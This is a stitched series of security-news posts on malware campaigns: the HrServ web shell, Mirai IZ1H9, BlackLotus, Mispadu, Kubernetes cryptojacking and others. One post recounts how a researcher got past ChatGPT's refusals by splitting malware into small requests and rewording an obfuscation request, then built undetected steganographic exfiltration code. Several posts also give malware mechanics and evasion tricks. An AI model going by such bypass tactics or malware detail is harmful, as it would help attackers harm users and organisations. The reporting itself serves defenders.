The Alarming Emergence of Web Shells in Cyber Warfare

Web shells, a relatively obscure term outside cybersecurity circles, represent a formidable threat in the digital age. They are malicious scripts or programs that hackers deploy on compromised web servers, enabling remote access and control. The discovery of HrServ marks a significant escalation in this digital arms race. Typically, web shells are rudimentary in nature, but HrServ breaks this mold with its advanced capabilities and stealthy operations, setting a new benchmark for cyber threats.

Stumbling Upon ‘HrServ’

The journey to unearthing HrServ began with the routine analysis of suspicious files. Researchers stumbled upon ‘hrserv.dll,’ initially not appearing to deviate from the norm. However, closer inspection revealed its true nature. The web shell exhibited unprecedented features, including custom encoding methods for client communications and the ability to execute commands directly in the system’s memory, a tactic that significantly complicates detection.

Decoding HrServ’s Sophisticated Mechanics

HrServ’s infection chain starts with the creation of a scheduled task named ‘MicrosoftsUpdate,’ which further executes a batch file. This file then facilitates the copying of ‘hrserv.dll’ into the crucial System32 directory, effectively embedding the malware deep within the system. From here, HrServ springs to life, initiating an HTTP server and managing client-server communication with intricate custom encoding, involving Base64 and FNV1A64 hashing algorithms.

The Ingenious GET Parameter Technique

One of the most striking aspects of HrServ is its utilization of a GET parameter technique in its HTTP requests, specifically the parameter ‘cp.’ The GET parameter technique used in the HrServ web shell attack involves using specific parameters in the URL of an HTTP GET request to trigger various functions within the malware. In this case, the parameter named “cp” plays a critical role. Different values of this “cp” parameter lead to different actions being executed by the web shell. For example:

• GET with cp=0: Calls VirtualAlloc, copies a custom decoded NID cookie value, and creates a new thread.
• POST with cp=1: Creates a file and writes the custom decoded POST data to it.
• GET with cp=2: Reads a file using the custom decoded NID cookie value and returns it in the response.
• GET with cp=4 and 7: Returns Outlook Web App HTML data.
• POST with cp=6: Indicates a code execution process, copying decoded POST data to memory and creating a new thread.

This technique allows the malware to perform various actions based on the HTTP request it receives, making it a versatile and dangerous tool for attackers. The use of common parameters like those found in Google services could also help mask the malicious traffic, blending it with legitimate web traffic and making detection more challenging.

Mimicking Google’s Web Traffic Patterns

In a cunning move to evade detection, HrServ’s communication pattern is modeled to mimic Google’s web services. This resemblance is not accidental but a deliberate attempt to blend malicious traffic with legitimate web services, making it a needle in a digital haystack for network monitoring systems.

The Afghan Government Entity: A Sole Victim with Global Implications

Remarkably, the only known victim of HrServ, as per the available data, was a government entity in Afghanistan. This targeted approach hints at the possibility of state-sponsored cyber espionage, although the attribution remains unclear. The implications of such a sophisticated attack extend far beyond a single entity, posing a stark reminder of the vulnerabilities inherent in digital infrastructures worldwide.

Unraveling the Mystery: Who is Behind HrServ?

The origins and affiliations of the HrServ creators remain shrouded in mystery. However, certain clues point towards a non-native English-speaking group, deduced from language patterns and technical intricacies observed in the malware. Moreover, the use of specific parameters akin to those in Google services suggests a high level of sophistication and understanding of global web traffic patterns.

Looking Ahead: A Cybersecurity Challenge for the Future

The discovery of HrServ represents a watershed moment in the ongoing battle between cybercriminals and defenders. Its sophisticated design, evasive techniques, and targeted application signify a new era in cyber threats, one where traditional defense mechanisms may no longer suffice. As cybersecurity experts continue to dissect and understand HrServ, the digital world braces for future challenges, emphasizing the ever-evolving nature of cyber threats and the perpetual need for innovative defense strategies.

The post How hrserver.dll stealthy webshell can mimic Google’s Web Traffic to hide and compromise networks appeared first on Information Security Newspaper | Hacking News.

Tenda G103 command injection vulnerability, referred to as CVE-2023-27076
LB-Link command injection vulnerability, also known as CVE-2023-26801
CVE-2023-26802: DCN DCBI-Netlog-LAB remote code execution vulnerability
Zyxel remote code execution vulnerability

Devices that have been compromised might be completely controlled by the attackers who exploited them and become a member of the botnet. These devices have the potential to be used in the commission of further attacks, such as distributed denial-of-service (DDoS) attacks. IZ1H9 presents a significant risk since it exploits many vulnerabilities and can take complete control of affected devices, which then become a member of its botnet. Since November 2021, when it was first seen in the wild, the Mirai IZ1H9 version has been tied to a number of different initiatives. These activities are most likely the workmanship of a single threat actor, as shown by crucial signs such as similar malware shell script downloaders, same XOR decryption keys, and identical function use.

On April 10, 2023, researchers discovered strange traffic that pointed towards a shell script downloader called ‘lb.sh’ and originated from a certain IP. In the event that it was successfully performed, the downloader would first clear the logs, hiding the operations it had been doing, and then it would download bot clients that were customized to work with a variety of Linux architectures. In the last step, it alters the iptable rules of the device, which causes network connections from many ports to become disrupted. Victims will have a harder time recovering remote devices as a result of this strategy.

After doing more research, it turned out that there were two other URLs online that had shell script downloaders. These downloaders had botnet clients that communicated with a command and control (C2) server as well as other URLs that hosted shell scripts. It was observed that the shell script downloaders were downloading botnet clients from a predetermined set of places and making contact with several C2 domains.

After doing an analysis on the samples that were downloaded, the researchers came to the conclusion that they constituted a subtype of the Mirai botnet known as IZ1H9. Since its discovery in August of 2018, IZ1H9 has gained a lot of attention and continues to be one of the most active Mirai variations. IZ1H9, like the original Mirai, avoids execution for a range of IP blocks, kills other botnet processes, and tries connection to a hardcoded C2 address. This is only one of the numerous similarities between the two variants.

Remote code execution attacks continue to be the most prevalent and most worrying dangers that afflict linux servers and IoT devices. IoT devices have long been a profitable target for threat actors. Devices that are susceptible to attack and are left exposed might result in major danger.

Even if the vulnerabilities that are being exploited by this threat are not as difficult to exploit, their effect is not diminished since they may still result in remote code execution. Once the attacker has gained control of a susceptible device, they are able to add that device and any others that have been hacked to their botnet. This enables them to carry out further attacks, such as a distributed denial of service.

It is strongly suggested that patches and updates be deployed whenever they can be in order to protect against this hazard.

The post Mirai Botnet is back with a new version IZ1H9 appeared first on Information Security Newspaper | Hacking News.

The recently found Linux form of the PingPull virus utilizes a statically linked OpenSSL library and talks with a domain for C2 through port 8443. It uses the same AES key as the original Windows PE form of PingPull and has some characteristics in common with the web shell known as China Chopper. It is possible to upload a file to the system using the Sword2033 backdoor, get a file from the system using the Sword2033 backdoor, and execute a command using the Sword2033 backdoor. The investigation into the C2 domain uncovered connections to the actions of Alloy Taurus, including proof that the domain impersonated the South African military. This impersonation is especially noteworthy since it took place during the month of February 2023, when South Africa took part in joint naval drills with Russia and China.

In addition, the researchers discovered persistent connections between the Sword2033 C2 server and the IP hosting subdomains for an organization that finances extended-term urban infrastructure development projects in Nepal. This finding sheds light on the continuous danger presented by the Alloy Taurus gang and stresses how important it is for businesses and other organizations to maintain a diligent vigilance in their cybersecurity operations.
It is important to note that Alloy Taurus continues to pose a serious risk to governmental, financial, and telecommunications institutions across Southeast Asia, Europe, and Africa. The discovery of a Linux edition of the PingPull virus, together with the recent usage of the Sword2033 backdoor, hints that the gang is continuing to develop its operations in order to assist their spying endeavors. We strongly recommend that all companies make use of our results in order to advise the implementation of defensive measures in order to defend themselves against this danger group.

The post Traffic to South African military websites from Linux server? Infection symptom of PingPull malware appeared first on Information Security Newspaper | Hacking News.

According to the data  collected on the sources of traffic going to the site, evilextractor[. ]com in March 2023, malicious activity saw a considerable uptick. On March 30th, experts discovered malware in a phishing email campaign, and they were able to link back to the samples of this. Typically, it will appear to be a valid file, such as an Adobe PDF or a file from Dropbox, but as soon as it is loaded, it will start using PowerShell to do malicious operations. In addition to that, it has features for monitoring the environment and preventing virtual machines. Its major function seems to be to collect browser data and information from endpoints that have been hacked, which it subsequently sends to an FTP server controlled by the attacker.

The researchers saw an increase in the number of attacks that disseminated the virus in the month of March 2023. The majority of infections were recorded in the United States and Europe.

An individual who uses the alias Kodex online is the one who advertises and sells the tool on cybercrime message boards. The program’s creator first made it available in October 2022 and is continually expanding its capabilities by adding new modules that come equipped with advanced capabilities.

The malicious software has the ability to steal sensitive data from the infected endpoint, such as the browser history, passwords, cookies, and more. Additionally, the malicious software is able to record keystrokes, activate the camera, and take screenshots. The specialists have discovered that the malware also has a ransomware function that is known as “Kodex Ransomware.”

The security analysts discovered a phishing effort that included a malicious attachment in the form of a PDF file that was disguised as a request to confirm an existing account. The perpetrator of the attack gets the victim to open the attachment by tricking them into clicking on the PDF icon.

It has been discovered that EvilExtractor is being used as a complete information stealer with numerous harmful characteristics, including ransomware. It is possible for a PowerShell script to avoid detection when run using a.NET loader or PyArmor. Within a relatively short period of time, its creator has improved the system’s reliability and updated a number of its functionalities. This blog post demonstrates how threat actors initiate an attack using phishing mail and identifies the files that are used to extract the EvilExtracrtor PowerShell script. In addition to this, they went through the functionalities that are available, the kind of information that may be gathered by EvilExtractor, and how the Kodex Ransomware operates. Users need to be aware of this new information stealer and should continue to exercise extreme caution when it comes to e-mails that seem to be suspicious.

The post New famous all in one malware and hacking tool among cyber criminals: EvilExtractor appeared first on Information Security Newspaper | Hacking News.

Since the introduction of ChatGPT in November, the OpenAI chatbot has assisted over 100 million users, or around 13 million people each day, in the process of generating text, music, poetry, tales, and plays in response to specific requests. In addition to that, it may provide answers to exam questions and even build code for software.

It appears that malicious intent follows strong technology, particularly when such technology is accessible to the general people. There is evidence on the dark web that individuals have used ChatGPT for the development of dangerous material despite the anti-abuse constraints that were supposed to prevent illegitimate requests. This was something that experts feared would happen. Because of this, experts from forcepoint came to the conclusion that it would be best for them not to create any code at all and instead rely on only the most cutting-edge methods, such as steganography, which were previously exclusively used by nation-state adversaries.

The demonstration of the following two points was the overarching goal of this exercise:

1. How simple it is to get around the inadequate barriers that ChatGPT has installed.
2. How simple it is to create sophisticated malware without having to write any code and relying simply on ChatGPT

Initially ChatGPT informed him that malware creation is immoral and refused to provide code.

1. To avoid this, he generated small codes and manually assembled the executable.  The first successful task was to produce code that looked for a local PNG greater than 5MB. The design choice was that a 5MB PNG could readily hold a piece of a business-sensitive PDF or DOCX.

 2. Then asked ChatGPT to add some code that will encode the found png with steganography and would exfiltrate these files from computer, he asked ChatGPT for code that searches the User’s Documents, Desktop, and AppData directories then uploads them to google drive.

3. Then he asked ChatGPT to combine these pices of code and modify it to to divide files into many “chunks” for quiet exfiltration using steganography.

4. Then he submitted the MVP to VirusTotal and five vendors marked the file as malicious out of sixty nine.

5. This next step was to ask ChatGPT to create its own LSB Steganography method in my program without using the external library. And to postpone the effective start by two minutes.

6. The another change he asked ChatGPT to make was to obfuscate the code which was rejected. Once ChatGPT rejected hisrequest, he tried again. By altering his request from obfuscating the code to converting all variables to random English first and last names, ChatGPT cheerfully cooperated. As an extra test, he disguised the request to obfuscate to protect the code’s intellectual property. Again, it supplied sample code that obscured variable names and recommended Go modules to construct completely obfuscated code.

7. In next step he uploaded the file to virus total to check

And there we have it; the Zero Day has finally arrived. They were able to construct a very sophisticated attack in a matter of hours by only following the suggestions that were provided by ChatGPT. This required no coding on our part. We would guess that it would take a team of five to ten malware developers a few weeks to do the same amount of work without the assistance of an AI-based chatbot, particularly if they wanted to avoid detection from all detection-based suppliers.

The post How to create undetectable malware via ChatGPT in 7 easy steps bypassing its restrictions appeared first on Information Security Newspaper | Hacking News.

The attack resulted in the compromising of the software build system that was used to generate and distribute versions of the app for Windows and macOS. The app delivers VoIP and PBX services to “over 600,000 clients,” some of which include American Express, Mercedes-Benz, and Price Waterhouse Cooper. Since the attackers controlled the software development system, they were able to insert malware into 3CX applications, even though those applications had been digitally signed using the official signing key for the firm.

This is a traditional kind of attack on supply chains, and its purpose is to take advantage of the trust connections that exist between an organization and third parties.

According to the cybersecurity company CrowdStrike, the infrastructure and encryption key used in the attack are identical to those seen in a campaign carried out by Labyrinth Chollima on March 7. Labyrinth Chollima is the tracking name for a threat actor that is aligned with the North Korean government.

The attack was first discovered late on Wednesday night, when products from a variety of different security organizations started identifying malicious activity emanating from properly signed binaries for 3CX desktop applications. No later than February 2022, the threat actor registered a huge collection of domains that were used to interact with infected devices. These domains were employed in the preparations for the complex operation that was to follow. Around the 22nd of March, the cybersecurity company Sentinel One saw an increase in the number of behavioral detections of the 3CXDesktopApp. On the same day, 3CX customers began online discussions about what they thought could have been erroneous 3CXDesktopApp detections by their endpoint security programs.

Electron Mac App versions 18.11.1213, 18.12.402, 18.12.407, and 18.12.416 all include a “security problem,” according to 3CX Chief Information Security Officer Pierre Jourdan. He claimed the payloads were put into packaged libraries produced using Git, a mechanism that software developers use to monitor changes in the programs they create. According to him, a significant number of the servers owned by the attackers that compromised workstations attempt to communicate with have already been taken down.

Since the 2020 attack on SolarWinds, which resulted in data breaches at businesses and governmental organizations all across the globe, software vendors have been on high alert for supply-chain invasions.

The post 600,000 companies networks using 3CX VoIP software infected with malware. Biggest supply chain attack appeared first on Information Security Newspaper | Hacking News.

The total number of government websites that victims were accessing when their credentials were compromised is as follows:

Chile:105
Mexico: 431
Peru: 265
The following is a list of online banking websites in latin america that victims were using when their credentials were compromised and subsequently stolen:

In these campaigns, strategies, tactics, and processes known as TTPs were used that are similar to the banking trojan known as Mispadu.
ESET made the discovery of the malware known as Mispadu around 2019; it is known to target nations in South America via spamming and malicious advertising activities. Because of the group’s malware-as-a-service mode of operation as well as the high level of activity it displays in the area, it is vital to keep an eye on this organization. As a consequence of this, the gang has been continually launching new sorts of operations. These campaigns feature many levels of obfuscation as well as new methodologies, which makes it challenging to adequately safeguard systems against the threat.

Compromising genuine websites and using them as Command & Control Servers for the purpose of furthering the propagation of malware is one of their primary techniques. They achieve this by scanning for websites using outdated versions of content management systems, like WordPress, and compromising those websites. From that point on, they leverage these websites to spread malware in a customized manner. For example, they may filter out countries that they do not wish to infect, drop different types of malware depending on the country that is being infected, and even deploy a one-of-a-kind malicious RAT (Remote Administration Tool) when they detect an interesting device, such as a computer belonging to an employee of a bank.

Throughout these campaigns, the gang will not consider a victim if that person’s system language is any of the following:

Spanish Spain
The English United States of America
Portuguese – Brazil

Since the cybercriminals have automated a method for producing payloads, they are able to swiftly distribute new kinds of malware. As a result, they can extend their operations and run many campaigns in simultaneously.

According to the findings of research of the malware, it is abundantly evident that the gang has an in-depth understanding of the major financial institutions and banks located inside the Latin American nations under attack. The use of several Spanish terms in their malware provides evidence that some of the programmers may be of Latino descent; more precisely, the slang that was used in the comments provides evidence that some of the programmers may be from Chile.

Researchers found numerous additional strategies that were incorporated in this enormous outbreak, which allowed the cybercriminals to access hundreds of different credentials. .

Its multi-stage infection method breaks the dangerous tactics down into their constituent parts, making it more difficult to spot. The following figure provides a visual representation of this tactic:

In order to make it more difficult to detect, cybercriminals embed malware inside of false certificates. They then utilize an authorized Windows tool called “certutil” in an improper manner in order to decode and run the banking malware.

Although while Mispadu campaigns were successful in compromising thousands of users, the infection rate of corporate users (who typically have both an antivirus and an EDR/XDR) is still relatively low. This is because corporate users generally have both of these security measures in place.

However, businesses need to operate under the assumption that at some point in the not-too-distant future, one of their employees will be compromised. As a result, they should devise a plan that will help cut down on the amount of time it takes to detect and respond to security threats, while also improving the SOC’s monitoring, detection, and response capabilities.

The post Mispadu Banking Trojan Is Stealing Millions From Victims In Chile, Mexico, Peru And Portugal appeared first on Information Security Newspaper | Hacking News.

A cryptojacking operation using Monero was also discovered; this operation is aware of the Dero effort and is actively competing with it. The Monero campaign mines XMR on the host by elevating their privileges via the usage of DaemonSets and mounting the host as the root user.

Attackers specifically targeted Kubernetes clusters running on non-standard ports by scanning for and locating exposed vulnerable Kubernetes clusters that had the authentication setting —anonymous-auth=true. This setting enables anonymous access to the Kubernetes API and was the target of the attackers’ attention. It is possible for a user with adequate access to mistakenly expose a secure Kubernetes API on the host where kubectl is operating by performing the “Kubectl proxy” command. This is a less apparent approach to expose the secure Kubernetes cluster without authentication. The Kubernetes control plane application programming interface does not provide anonymous access out of the box in Kubernetes. Nevertheless, since the choice to make secure-by-default the default was delayed, and there are a variety of ways in which Kubernetes might be inadvertently exposed, there is still a legacy of exposed systems on the internet.

After the first engagement with the Kubernetes API, the attacker will next install a Kubernetes DaemonSet with the name “proxy-api.” On every node in the Kubernetes cluster, the DaemonSet installs a pod that contains malicious code. This makes it easier for attackers to operate a cryptojacking operation by simultaneously using the resources of all of the nodes in the network. The mining efforts that are performed by the pods are donated back to a community pool. This pool then divides the reward (in the form of Dero currency) among all of its contributors in an equitable manner via their own digital wallets.

Once the vulnerable Kubernetes cluster had been compromised, the attackers did not make any attempts to pivot either by moving laterally to attack additional resources or by scanning the internet for discovery. This is a pattern that is common among many cryptojacking campaigns that have been observed in the wild.

In addition, the attackers did not try to remove or interfere with the functioning of the cluster. Instead, they used a DaemonSet to mine Dero. The name of the DaemonSet was disguised as “proxy-api,” and the name of the miner was “pause,” both of which are phrases that are often seen in Kubernetes logs.

These targeted behaviors seem to define the goal of this campaign, which is that the attackers are only seeking to mine for Dero. This is the conclusion that can be drawn from the actions that have been taken. As a result, we have reason to believe that a cryptojacking actor driven by financial gain is the one responsible for this initiative.

Attackers have taken advantage of the fact that Kubernetes has become the most popular container orchestrator in the world to focus their attention on misconfigurations, design flaws, and zero-day vulnerabilities inside Kubernetes and Docker.

The post New cryptojacking malware can hack in Kubernetes clusters using this easy trick appeared first on Information Security Newspaper | Hacking News.

This week, federal authorities in Los Angeles seized an internet domain that was being used to sell malicious software for computers. This software allowed cybercriminals to take control of infected computers and steal a wide variety of information. The seizure of this domain was part of an international effort by law enforcement to combat cybercrime.

The website www.worldwiredlabs.com was seized on Tuesday as a result of a seizure warrant that was approved by a United States Magistrate Judge on March 3 and then executed on Tuesday. The warrant allowed for the seizure of the NetWire remote access trojan (RAT), a sophisticated program that was capable of targeting and infecting all of the major computer operating systems. According to court documents filed in Los Angeles, “a RAT is a type of malware that allows for covert surveillance, allowing a ‘backdoor’ for administrative control and unfettered and unauthorized remote access to a victim’s computer, without the victim’s knowledge or permission.” This information was gleaned from “A Malware That Allows for Covert Surveillance,” which was published by the Los Angeles Times.

On Tuesday, as part of the law enforcement operation that has been going on throughout this week, officials in Croatia detained a citizen of Croatia who is suspected of being the administrator of the website. The Croatian authorities will be in charge of the prosecution of this offender. Meanwhile, on Tuesday, Swiss law enforcement agencies were successful in seizing the computer server that hosted the NetWire RAT architecture.

In the year 2020, the FBI office in Los Angeles initiated an investigation into worldwidelabs, which was the only online distributor of NetWire that was known at the time. According to the affidavit that supported the seizure warrant, FBI agents working undercover registered for an account on the website, paid for a subscription plan, and “constructed a customized instance of the NetWire RAT using the product’s Builder Tool.” This information was included in the document that was used to obtain the warrant.

The software was advertised on hacking forums, and numerous cyber security companies and government agencies have documented instances of the NetWire RAT being used in criminal activity. Despite the fact that the website marketed NetWire as a legitimate business tool to maintain computer infrastructure, the affidavit states that NetWire is malware used for malicious purposes. In addition, the affidavit states that the software was advertised on hacking forums.

According to United States Attorney Martin Estrada, “today’s action is a testimony to the inventiveness and flexibility essential to confront cybercriminals who operate beyond boundaries.” “Our office will continue to develop worldwide partnerships in order to safeguard our communities from the dangers posed by cyberattacks. NetWire was used on a worldwide scale by criminals, and as a response, we have dismantled the infrastructure that was responsible for the incalculable amount of damage that was brought to victims all over the globe.

According to Donald Alway, the Assistant Director in Charge of the FBI’s Los Angeles Field Office, “The FBI has affected the criminal cyber environment by deleting the Netwire RAT.” This statement was made by the FBI. “The worldwide alliance that resulted to the arrest in Croatia also eliminated a popular program that was used to hijack computers in order to perpetrate global fraud, data breaches, and network assaults by threat organizations and cyber criminals,” the statement said.

The post Busted! Netwire malware infrastructure used to illegally steal data from computers seized appeared first on Information Security Newspaper | Hacking News.

A new worldwide campaign known as S1ideload Stealer has been uncovered by Bitdefender. This campaign targets Facebook and YouTube accounts. The harmful components of S1deload Stealer are executed via DLL sideloading methods, which are relied on by the malware. It makes use of a legal executable that has been cryptographically signed, but clicking on it launches malicious code by accident.
S1deload Stealer is able to successfully infect systems due to the fact that sideloading assists in evading system defenses. Also, in order to reduce the likelihood that the user would think the executable is malicious, it goes to a genuine picture folder. Once a computer is infected with S1deload Stealer, it will steal user credentials, imitate human behavior in order to artificially boost engagement with videos and other content, determine the value of individual accounts (for example, by determining who the corporate social media admins are), mine for BEAM cryptocurrency, and spread the malicious link to the user’s followers.

Since November 2022, Sys01 Stealer has been focusing its attention on personnel working in a variety of sectors, including the government and the industrial sector, with the goal of stealing information such as passwords, cookies, and data from Facebook ads and corporate accounts.

This campaign demonstrates how threat actors are increasingly leveraging ad content to trick consumers into clicking on harmful links by employing social engineering techniques.

According to our assessment, SYS01 is a continuation of methods that are similar to those utilized by other organizations. A user should not be able to click on unchecked links or attachments on any messaging network, hence platforms that enable this should be restricted. Seen as a whole, this demonstrates how those who pose a danger adapt their methods and techniques over time and zero in on particular targets. And how difficult it may be to definitively attribute certain strains of malware to particular organizations when both the virus and the groups who employ it are in a state of perpetual change.

The post New infostealer malware S1ideload infects systems of government & manufacturing companies appeared first on Information Security Newspaper | Hacking News.

The following is a rundown of the most important information on BlackLotus,  that provides a concise summary of the sequence of events that are connected to it.

It is possible to operate on the most recent versions of Windows 11 that have all available patches installed and UEFI Secure Boot enabled. It does this by exploiting a vulnerability that is more than a year old (CVE-2022-21894) in order to get around UEFI Secure Boot and establish persistence for the bootkit. This is the very first instance of this vulnerability being exploited in the field and being widely aware about it.

Despite the fact that the vulnerability was patched in the update that Microsoft released in January 2022, its exploitation is still feasible since the impacted binaries that have been legitimately signed have not yet been placed to the UEFI revocation list. BlackLotus makes use of this fact by introducing its own versions of valid binaries that are, nonetheless, susceptible to exploits into the system in order to take use of the vulnerability.

It is possible to disable operating system security measures including BitLocker, HVCI, and Windows Defender amongst others.
Once it has been installed, the primary objective of the bootkit is to install a kernel driver, which, among other things, prevents the bootkit from being removed, as well as an HTTP downloader, which is responsible for communication with the command and control server and is able to load additional user-mode or kernel-mode payloads.
At the very least, BlackLotus has been promoted and offered for sale on underground message boards since October 6th, 2022. 
It is interesting to note that some of the BlackLotus installers that have been investigated do not continue with the installation of the bootkit if the compromised host utilizes one of the following locales:

• Romanian (Moldova), ro-MD
• Russian (Moldova), ru-MD
• Russian (Russia), ru-RU
• Ukrainian (Ukraine) , uk-UA
• Belarusian (Belarus), be-BY
• Armenian (Armenia), hy-AM
• Kazakh (Kazakhstan), kk-KZ

A rundown of the attack
Image illustrates a condensed version of the BlackLotus compromise chain’s overall structure. It is made up of these three primary components:

It begins with the execution of an installer, which is shown as step one . This installer is in charge of deploying the bootkit’s data to the EFI System partition, turning off HVCI and BitLocker, and then restarting the computer.
Exploitation of CVE-2022-21894 and subsequent enrolment of the attackers’ Machine Owner Key (MOK) occurs after the first reboot to achieve persistence even on systems with UEFI Secure Boot enabled. This happens after the vulnerability has been exploited. The computer is restarted once again  at this point.
Execution of the self-signed UEFI bootkit occurs on all future boots, at which point it delivers both its kernel driver and user-mode payload, in the form of an HTTP downloader. Combined, these components provide the bootkit the ability to withstand removal attempts and allow for the downloading and execution of further user-mode and driver components obtained from the C&C server as per experts.

The post This new UEFI bootkit malware of size 80 Kb can hack patched Windows 11, 10 Machine with AV appeared first on Information Security Newspaper | Hacking News.

Other discoveries include something called PyPI malware “minimums,” which is programmed to look for the presence of a virtual machine (VM) before carrying out its intended function. The goal is to thwart the efforts of security researchers, who frequently test suspected malware in virtual machines (VMs), in order to learn more about the danger.

The total number of packages that have been identified as malicious, suspicious, or proof-of-concept since 2019 has nearly reached 107,000 thanks to the discoveries made by the company’s AI tooling.

A new piece of Python malware with capabilities combining those of a remote access tool (RAT) and information stealer was also found by the security vendor.

Last but not least, it discovered a developer with a dubious appearance who went by the name “infinitebrahamanuniverse” and uploaded more than 33,000 packages that described themselves as sub-packages of “no-one-left-behind” or “nolb.” The latter was taken off the market a week ago after it was discovered by the npm security team that it was dependent on every other npm package that was publicly available. Now take into consideration a malicious actor who is exploiting this dependency in order to launch an attack. This threat actor can launch a Denial of Service (DoS) attack against a company’s download channel by adding it to a typosquatting package. This attack can waste the time of developers by forcing them to wait for their npm environment to be ready. The installation of a package that has this dependency can also result in an excessive consumption of resources. If you have been following along with this series, you should already be aware that the events depicted here are not completely implausible.

The post 691 malicious npm packages and 49 PyPI components containing crypto-miners, remote access Trojans discovered appeared first on Information Security Newspaper | Hacking News.